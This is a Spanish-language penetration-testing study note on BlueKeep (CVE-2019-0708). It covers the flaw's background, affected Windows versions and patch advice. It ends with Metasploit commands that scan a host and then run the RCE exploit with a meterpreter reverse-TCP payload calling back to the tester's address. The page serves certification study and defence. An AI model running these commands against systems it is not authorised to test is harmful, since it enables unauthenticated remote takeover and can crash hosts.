> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/ataques-basados-en-sistema-host/windows/explotacion-de-vulnerabilidades-de-windows/explotacion-de-la-vulnerabilidad-cve-2019-0708-de-rdp-en-windows-bluekeep.md).

# Explotación de la vulnerabilidad CVE-2019-0708 de RDP en Windows (BlueKeep)

### 🧠 ¿Qué es BlueKeep?

**BlueKeep** es el nombre dado a una grave vulnerabilidad de ejecución remota de código (RCE) en el protocolo RDP de Windows, identificada como **CVE-2019-0708**. Esta vulnerabilidad permite a los atacantes ejecutar código arbitrario en el sistema sin autenticación previa, ganando acceso remoto y comprometiendo completamente el sistema afectado, así como otros en la misma red.

***

### 📅 Contexto

* 🧾 **Descubierta por Microsoft:** Mayo de 2019
* 🛠️ **Parche lanzado:** 14 de mayo de 2019
* 🌍 **Impacto inicial:** Alrededor de **1 millón de sistemas vulnerables** en todo el mundo

***

### 💥 Detalles Técnicos

* La vulnerabilidad reside en la forma en que el servicio RDP maneja las solicitudes remotas.
* Permite a un atacante ejecutar código arbitrario en el **espacio del kernel** del sistema, obteniendo control total.
* **No requiere autenticación** previa: el ataque puede ejecutarse sin credenciales.

***

### 🖥️ Sistemas Afectados

* 🪦 Windows XP
* 🧓 Windows Vista
* 🪟 Windows 7
* 🖥️ Windows Server 2008
* 🖥️ Windows Server 2008 R2

***

### 🛡️ Recomendaciones

* 🧷 Aplicar el parche de seguridad lanzado por Microsoft tan pronto como sea posible.
* 🚫 No ejecutar PoCs (Proof of Concept) no verificados, ya que muchos contienen código malicioso.

***

### 🧪 Explotación con Metasploit

Metasploit ofrece tanto un módulo **auxiliary** como un módulo **exploit** para BlueKeep:

#### ✅ Comprobar si el sistema es vulnerable

```bash
msfconsole
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS <IP del objetivo>
run
```

#### 🚀 Explotar la vulnerabilidad

```bash
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS <IP del objetivo>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <tu IP>
exploit
```

{% hint style="danger" %}
**Nota importante:** Este exploit interactúa directamente con la memoria del kernel, lo que puede provocar un **BSOD (pantallazo azul)** o un **crash** del sistema si no se ejecuta correctamente.
{% endhint %}
